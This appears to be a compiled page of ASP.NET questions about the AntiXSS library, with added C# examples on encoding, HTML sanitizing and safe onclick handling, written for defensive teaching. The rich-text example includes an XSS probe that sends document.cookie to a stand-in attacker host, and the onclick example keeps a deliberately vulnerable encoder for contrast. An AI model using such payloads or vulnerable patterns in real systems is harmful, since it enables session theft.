Using Microsoft's AntiXssLibrary, how do you handle input that needs to be edited later?
For example:
User enters:
<i>title</i>
Saved to the database as:
<i>title</i>
On an edit page, in a text box it displays something like:
<i>title</i> because I've encoded it before displaying in the text box.
User doesn'...
I realise there are several rich text editors for jQuery but I cannot find any that have an associated class that does the filtering and cleaning required to accept the input into a database.
Does such a class exist?
I am particularly interested for a PHP library, but .NET would be interesting too.
...
I've been using Microsoft's AntiXss Library and was wondering if there is a good reason why its JavaScriptEncode method wraps the result in single quotes? That behavior seems unconventional.
...
I've downloaded and looked at the Microsoft AntiXSS library, but I'm not 100% sure I need to use it for server controls (asp:textbox, etc). Everything is fine when I use it with a standard html control (input, etc). It looks like the output is encoded twice when I use the antixss lib on the server controls.
I'm currently only using the...
I have been reading up on Anti-XSS Security Runtime Engine and it looks like a nice solution for web forms because it inspects controls via reflection and automatically encodes data where appropriate. However as I don't really use server side controls in ASP.NET MVC, it does not seem to be a viable solution for ASP.NET MVC. Is this corre...
I've just downloaded and taken a look at the new MS Anti_XSS 3.0 release. I've read through the help file, but I've found no mention of how to modify the whitelist it uses. Can items be added? Can items be removed?
...
Hello,
I have a question regarding AntiXSS implementation. If I were to read values from a textbox on a page and store them in a database directly, and then read the value from the database and insert it into a textbox, is there a chance that the tag or similar could be executed in the process?
Regards,
Andy
...
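The edit-page round trip asked about in the first question above, and again in Andy's question, as an added example that is not part of either post. It assumes AntiXSS 4.x (Microsoft.Security.Application.Encoder) and System.Web.dll are referenced; the helper names are made up for this illustration. The stored value is never encoded; the attribute encoder is applied only when the value is written into the text box, and the browser's own entity decoding is simulated with HttpUtility.HtmlDecode to show that what comes back on postback is the original string:

```csharp
// Added example: round-tripping an untrusted value through an edit form.
// Assumes AntiXSS 4.x (AntiXssLibrary.dll) and System.Web.dll.
using System;
using System.Web;
using Microsoft.Security.Application;

static class EditRoundTrip
{
    // 1. What the user typed. Store it in the database exactly like this
    //    (with parameterised SQL), without encoding: encoding is an output
    //    step, done for the context the value is written into.
    const string Stored = "<i>title</i> & \"quotes\"";

    // 2. Render the edit page. The value sits inside an attribute, so use the
    //    attribute encoder. The browser decodes the references when it parses
    //    the page, so the text box displays <i>title</i>, not &lt;i&gt;title...
    static string RenderTextBox(string value)
    {
        return "<input type=\"text\" name=\"title\" value=\""
             + Encoder.HtmlAttributeEncode(value) + "\" />";
    }

    // 3. Simulate the browser: decode the attribute to get what the user sees
    //    in the box and what the browser posts back when the form is submitted.
    static string ValueBrowserPostsBack(string renderedTag)
    {
        int start = renderedTag.IndexOf("value=\"", StringComparison.Ordinal) + 7;
        int end = renderedTag.IndexOf('"', start);
        return HttpUtility.HtmlDecode(renderedTag.Substring(start, end - start));
    }

    // Correct pipeline: decode(encode(x)) must give x back unchanged.
    static bool RoundTripPreservesValue(string value)
    {
        return ValueBrowserPostsBack(RenderTextBox(value)) == value;
    }

    // The pitfall from the asp:TextBox question: server controls already
    // attribute-encode .Text when they render, so encoding it yourself first
    // means the browser decodes only one layer and the user sees &lt;i&gt;.
    static bool DoubleEncodingPreservesValue(string value)
    {
        string doubleEncoded = Encoder.HtmlAttributeEncode(value);
        return ValueBrowserPostsBack(RenderTextBox(doubleEncoded)) == value;
    }

    static void Main()
    {
        Console.WriteLine(RenderTextBox(Stored));
        Console.WriteLine("single encode round-trips: " + RoundTripPreservesValue(Stored));
        Console.WriteLine("double encode round-trips: " + DoubleEncodingPreservesValue(Stored));
    }
}
```

The same rule answers Andy's question: the stored string can carry any tag it likes, and nothing executes as long as every page that writes it out encodes for the context it writes into (attribute encoder inside value="...", HTML encoder between tags). For an asp:TextBox set .Text to the raw stored value and let the control encode.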
Good morning, everyone.
I'm on a short-term contracting gig, trying to patch some vulnerabilities in their legacy code. The application I'm working on is a combination of Classic ASP (VBScript) and .NET 2.0 (C#). One of the tools they have purchased is Fortify 360.
Let's say that this is a current classic ASP page in the application...
I just ran across a question with an answer suggesting the AntiXss library to avoid cross site scripting. Sounded interesting, reading the msdn blog, it appears to just provide an HtmlEncode() method. But I already use HttpUtility.HtmlEncode().
Why would I want to use AntiXss.HtmlEncode over HttpUtility.HtmlEncode?
Indeed, I am not the...
Hello,
We are looking at using a library to help us detect SQL injections.
We are using sprocs and parameterized statements, but for the sake of this post, assume that we are only using some sort of library that detects/verifies user input.
What's the best one? Easiest to implement? Easiest to update/manage?
Why prefer one over the othe...
When you can simply encode the data using HttpUtility.HtmlEncode, why should we use AntiXss.HtmlEncode?
Why is white list approach better than black listing?
Also, in the Anti XSS library, where do I specify the whitelist?
...
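The HttpUtility.HtmlEncode versus AntiXss.HtmlEncode question, the white-list versus black-list question and the two "where is the whitelist" questions above are answered together by the added example below, which is not from any of the posts. It assumes AntiXSS 4.x: the probe strings are constructed, the regex check is my own, and the MarkAsSafe call and chart enum names (LowerCodeCharts.Default, LowerCodeCharts.Cyrillic and the *.None members) are the 4.x API as I know it and should be checked against the version you ship (the 3.0 release asked about has no public way to change its list):

```csharp
// Added example: a black-list encoder (replace a fixed set of bad characters)
// next to a white-list encoder (pass a fixed set of safe characters, encode
// everything else), plus where the AntiXSS 4.x safe list is configured.
using System;
using System.Text.RegularExpressions;
using System.Web;
using Microsoft.Security.Application;

static class EncoderComparison
{
    // Constructed probes on which the two approaches can differ.
    static readonly string[] Probes =
    {
        "<script>alert(1)</script>",  // both encoders handle the obvious case
        "it's",                       // ' was NOT encoded by HttpUtility before .NET 4
        "caf\u00e9",                  // a character outside Basic Latin
        "\u0416",                     // Cyrillic Zhe
    };

    // The white-list property you can test for, rather than trust: after
    // encoding, only letters, digits, spaces and complete character
    // references remain. Anything else got through unencoded.
    static readonly Regex OnlySafe =
        new Regex(@"^(?:[A-Za-z0-9 ]|&#\d+;|&#x[0-9A-Fa-f]+;|&[A-Za-z]+;)*$");

    static bool LooksWhiteListEncoded(string encoded)
    {
        return OnlySafe.IsMatch(encoded);
    }

    static void Main()
    {
        foreach (string p in Probes)
        {
            string blackList = HttpUtility.HtmlEncode(p);
            string whiteList = Encoder.HtmlEncode(p);
            Console.WriteLine("{0,-26} HttpUtility: {1,-34} white-list? {2}",
                p, blackList, LooksWhiteListEncoded(blackList));
            Console.WriteLine("{0,-26} AntiXss:     {1,-34} white-list? {2}",
                "", whiteList, LooksWhiteListEncoded(whiteList));
        }

        // Where the white list lives in AntiXSS 4.x: not in a config file but
        // in a call made once at startup (Application_Start). This keeps the
        // default charts and additionally marks Cyrillic as safe, so Russian
        // text is emitted literally instead of as one &#NNNN; per letter.
        // Widen the list only for scripts your pages really need; every chart
        // you add is a chart the encoder no longer protects you from.
        UnicodeCharacterEncoder.MarkAsSafe(
            LowerCodeCharts.Default | LowerCodeCharts.Cyrillic,
            LowerMidCodeCharts.None,
            MidCodeCharts.None,
            UpperMidCodeCharts.None,
            UpperCodeCharts.None);
        Console.WriteLine("after MarkAsSafe: " + Encoder.HtmlEncode("\u0416"));
    }
}
```

The reason to prefer the white list is visible in the probe loop: a black list is only as complete as its author's knowledge of browser parsing, while a white list of a few dozen safe characters is finite and does not need updating when a new encoding trick appears.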
In the intent of preventing XSS attacks, I am updating a page in which we have a textbox that accepts HTML, stores it in a database and retrieves and renders it at a later time.
My understanding is that I can sanitize the HTML using AntiXSS.GetSafeHtmlFragment() method. As long as I do this before storing the HTML in the database, am I ...
I am attempting to find the optimal method of guarding against Cross Site Scripting in my ASP.NET MVC application. I planned to use Microsoft’s AntiXSS library and essentially guard on two levels: 1) Protect regular textboxes (i.e. those that should only contain plain text and 2) Protect rich text boxes which can generate HTML. The libra...
I have an editor that lets users add HTML that is stored in the database and rendered on a web page. Since this is untrusted input, I plan to use Microsoft.Security.Application.AntiXss.GetSafeHtmlFragment to sanitize the HTML.
Should I sanitize before saving to the database or before rendering the untrusted input into the webpage?
Is ...
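The three questions above (sanitize before storing, the two-level MVC design, sanitize before save or before render) all come down to the same two boundaries, shown in the added example below, which is not from any of the posts. It assumes AntiXSS 4.x, where the sanitizer is Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment in HtmlSanitizationLibrary.dll (in 3.x it was AntiXss.GetSafeHtmlFragment); the posted HTML is constructed and the helper names are made up:

```csharp
// Added example: where sanitising and encoding sit relative to the database.
// Assumes AntiXSS 4.x (AntiXssLibrary.dll + HtmlSanitizationLibrary.dll).
using System;
using Microsoft.Security.Application;

static class RichTextStorage
{
    // Constructed sample of what an HTML editor might post back, carrying an
    // event handler, a script element and a javascript: URL.
    const string PostedHtml =
        "<p onmouseover=\"alert(1)\">Hello <b>world</b></p>" +
        "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>" +
        "<a href=\"javascript:alert(2)\">link</a>";

    // Level 2, input boundary: reduce the editor's HTML to the safe subset
    // once and store the result. Storing the raw post and sanitising on every
    // render also works, but fails on the one output path that forgets it
    // (exports, e-mail notifications, RSS), so sanitise-before-store is the
    // default and sanitise-on-render the optional second layer.
    static string PrepareRichTextForStorage(string untrustedHtml)
    {
        return Sanitizer.GetSafeHtmlFragment(untrustedHtml);
    }

    // Output boundary for the rich field: the stored fragment is emitted as
    // markup on purpose, so it must NOT be HtmlEncoded (that would display the
    // tags as text). Its safety rests entirely on only sanitised markup ever
    // having been stored.
    static string RenderRichText(string storedFragment)
    {
        return "<div class=\"body\">" + storedFragment + "</div>";
    }

    // Level 1, plain-text fields (a title box): never markup, so store the raw
    // string and encode at output. No sanitiser involved.
    static string RenderTitle(string storedTitle)
    {
        return "<h1>" + Encoder.HtmlEncode(storedTitle) + "</h1>";
    }

    static void Main()
    {
        string stored = PrepareRichTextForStorage(PostedHtml);
        Console.WriteLine("stored:   " + stored);   // inspect: script, onmouseover and javascript: should be gone
        Console.WriteLine("rendered: " + RenderRichText(stored));
        Console.WriteLine("title:    " + RenderTitle("<b>not bold</b>"));
    }
}
```

Two caveats a practitioner wants here. First, the sanitizer's safe list has changed between AntiXSS releases (4.2 in particular stripped far more than earlier versions), so content sanitised under one version is not necessarily what a later version would produce; re-running the sanitizer over stored rows after an upgrade is cheap insurance. Second, the plain-text level must never be fed to GetSafeHtmlFragment: a title of "1 < 2" is text, and encoding, not sanitising, is what keeps it intact.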
I have a piece of JavaScript string, coming from an untrusted source, embedded inside of an onclick tag and I'm not sure what the correct way of encoding this string is. Here is a simplification of the HTML:
<input type="button" onclick="alert([ENCODED STRING HERE]);"
value="Click me" />
I use the Microsoft AntiXss library which c...
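The onclick question above and the earlier question about JavaScriptEncode wrapping its result in single quotes are the same problem: an event handler attribute is two contexts, a JavaScript string literal inside an HTML attribute value, and the quotes are emitted because the encoder is defining the literal for you. The added example below is not from either post; it assumes AntiXSS 4.x and System.Web.dll, the attacker string is constructed, and the helper names are made up:

```csharp
// Added example: an untrusted string placed inside onclick="alert(...)".
// Assumes AntiXSS 4.x (AntiXssLibrary.dll) and System.Web.dll.
using System;
using System.Web;
using Microsoft.Security.Application;

static class OnClickEncoding
{
    // Constructed attacker value that tries to break out of both layers: the
    // JavaScript string literal and the surrounding HTML attribute.
    const string Untrusted = "x'); alert(document.cookie); //\" onmouseover=\"alert(1)";

    // Correct: encode inner layer first, outer layer second. JavaScriptEncode
    // emits the surrounding quotes itself and \xHH-encodes every non-alphanumeric
    // character, so no ' " < > & or \ survives inside the literal. The whole
    // script is then attribute-encoded. The browser undoes the layers in the
    // opposite order: attribute decoding while parsing, then the JS engine.
    static string BuildButton(string untrusted)
    {
        string jsLiteral = Encoder.JavaScriptEncode(untrusted);        // 'x\x27\x29...'
        string script = Encoder.HtmlAttributeEncode("alert(" + jsLiteral + ");");
        return "<input type=\"button\" onclick=\"" + script + "\" value=\"Click me\" />";
    }

    // Wrong, kept for contrast: attribute-encode only. It looks safe in the
    // page source, but the browser decodes &#39; back to ' before the script
    // runs, so the literal is terminated and the attacker's code executes.
    static string BuildButtonAttributeEncodeOnly(string untrusted)
    {
        string script = Encoder.HtmlAttributeEncode("alert('" + untrusted + "');");
        return "<input type=\"button\" onclick=\"" + script + "\" value=\"Click me\" />";
    }

    // Often the best answer: keep the data out of the script entirely. One
    // context, one encoder; the script reads the value back already decoded.
    static string BuildButtonWithDataAttribute(string untrusted)
    {
        return "<input type=\"button\" data-msg=\"" + Encoder.HtmlAttributeEncode(untrusted)
             + "\" onclick=\"alert(this.getAttribute('data-msg'));\" value=\"Click me\" />";
    }

    // What the script engine receives: the onclick value after the HTML parser
    // has decoded character references. Compare the two outputs.
    static string ScriptTheBrowserRuns(string tag)
    {
        int start = tag.IndexOf("onclick=\"", StringComparison.Ordinal) + 9;
        int end = tag.IndexOf('"', start);
        return HttpUtility.HtmlDecode(tag.Substring(start, end - start));
    }

    static void Main()
    {
        Console.WriteLine("correct:   " + ScriptTheBrowserRuns(BuildButton(Untrusted)));
        Console.WriteLine("attr only: " + ScriptTheBrowserRuns(BuildButtonAttributeEncodeOnly(Untrusted)));
        Console.WriteLine(BuildButtonWithDataAttribute(Untrusted));
    }
}
```

So the single quotes are not a quirk to strip: JavaScriptEncode hands you a complete literal, and concatenating it between your own quotes is what produces a broken or doubly quoted script. If you need the bare contents, AntiXSS 4.x has a JavaScriptEncode(string, bool emitQuotes) overload; 3.x does not.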
I'm looking at using WMD in my project instead of my existing RadEditor. I have been reading a few posts on how to store and retrieve the data, and I want to make sure I have the concept correct before proceeding.
If my research is correct, here is what I should be doing.
I should store the editor data twice (Once as HTML and once as...
With .net 4 there's a new <%: %> script enclosure that's like <%= %> but does an html encode. People are encouraging the use of this new syntax.
My question is, does <%: %> protect against XSS better or as well as using the Microsoft Anti XSS library?
A Microsoft security person once told me to never just use HTML Encode as it doesn't...
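On the <%: %> question above: that syntax calls HttpUtility.HtmlEncode, which in ASP.NET 4 is pluggable, so the two are not competitors; you can route <%: %> through the AntiXSS white-list encoder. AntiXSS 4.x ships a ready-made Microsoft.Security.Application.AntiXssEncoder for this. The added example below is not from the post; it shows what such an encoder overrides, assuming ASP.NET 4.0 (System.Web.Util.HttpEncoder) and AntiXSS 4.x, with the class and assembly names in the config comment made up:

```csharp
// Added example: an HttpEncoder that sends <%: %>, Html.Encode and
// HttpUtility.HtmlEncode through the AntiXSS white-list encoder.
// Assumes ASP.NET 4.0 and AntiXSS 4.x.
using System.IO;
using System.Web.Util;
using Microsoft.Security.Application;

public class WhiteListHttpEncoder : HttpEncoder
{
    // <%: %>, Html.Encode and HttpUtility.HtmlEncode arrive here.
    protected override void HtmlEncode(string value, TextWriter output)
    {
        output.Write(Encoder.HtmlEncode(value));
    }

    // Server controls encode attribute values (TextBox.Text etc.) through this.
    protected override void HtmlAttributeEncode(string value, TextWriter output)
    {
        output.Write(Encoder.HtmlAttributeEncode(value));
    }
}

// Registration goes in web.config (shown as a comment; hypothetical assembly name):
//   <system.web>
//     <httpRuntime encoderType="WhiteListHttpEncoder, MyWebApp" />
//   </system.web>
// or, using the class the library ships:
//   <httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary" />
```

Two limits remain whichever encoder is plugged in. <%: %> only HTML-encodes, so it is right between tags and inside quoted attributes but wrong for a value dropped into a script block, an event handler or a URL, which need JavaScriptEncode or UrlEncode instead. And <%: %> skips anything implementing IHtmlString (MvcHtmlString, for example) on the assumption that it is already safe, so a rich-text fragment wrapped that way is only as safe as the sanitizer that produced it.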
Hi All,
It seems to me that just using the HTML Agility Pack would work to prevent XSS (parse, then get InnerText). Would it be repetitive to use AntiXSS after using HAP?
Thanks,
rod.
...
My company requires our ASP.NET code to pass a Fortify 360 scan before releasing the code. We use AntiXSS everywhere to sanitize HTML output. We also validate input. Unfortunately, they recently changed the "template" Fortify was using and now it's flagging all our AntiXSS calls as "Poor Validation". These calls are doing things like Ant...
Hi All,
I have a report web page that allows you to export the records shown to an Excel file. I'm using AntiXss to display them on the screen, but when a user opts to export to a file and I go and get the records again from the DB, will I need to use AntiXss to scrub them for reporting purposes?
Thanks,
rod.
...